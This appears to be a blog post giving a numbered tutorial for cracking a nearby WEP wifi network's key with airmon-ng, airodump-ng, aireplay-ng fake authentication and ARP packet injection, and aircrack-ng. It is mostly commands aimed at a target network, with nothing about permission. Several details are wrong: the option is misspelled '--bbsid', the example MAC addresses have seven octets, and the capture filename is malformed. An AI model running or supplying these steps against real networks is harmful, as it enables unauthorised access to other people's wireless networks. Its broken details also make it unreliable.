1. make sure you're not connected to any wireless
ifconfig wlan0 down
2. start wifi monitoring mode. if success, you gonna have new wifi interface, mon0.
airmon-ng start wlan0
3. monitor all wifi around you. find any WEP near you. Once done, hit "ctrl+c" for stop.
4. capture data
airodump-ng mon0 --bbsid yourtargetbbsid -c targetchannel -w filenametosave
ex,
airodump-ng mon0 --bbsid 00:11:22:33:44:55:66 -c 2 -w mytarget
5. You must capture at least 25.000 data packets to crack WEP!! This can be done in two ways,
a. PASSIVE ATTACK. Just wait for client to connect to the AP and start capturing the data packets. This can be very slow, and can be up to days or even weeks!
b. ACTIVE ATTACK. This method is fast and only takes minutes to generate and inject that many packets. In an active attack you'll have do a fake auth to AP and generate and inject data packets. For this one, we gonna use "aireplay" command,
aireplay-ng -1 3 -a yourtagetbbsid interface
ex,
aireplay-ng -1 3 -a 00:11:22:33:44:55:66 mon0
6. After doing a fake auth, now is time to generate and inject ARP packets.
aireplay-ng -3 -b yourtargetbbsid -h yourwifimacaddress mon0
ex,
aireplay-ng -3 -b 00:11:22:33:44:55:66 -h 66:55:44:33:22:11:00 mon0
7. if this step was successful, you will see lot of data packets in the airodump capture. Wait till reach at least 25.000 packets. Best would be to wait till it reaches around 80.000-90.000 packets.
8. when everything is ready, now is time to crack the WEP!!! for the captured file, please refer to step number 4.
aircrack-ng nameofcapturefile
ex,
aircrack-ng mytarget-0.1-cap
No comments:
Post a Comment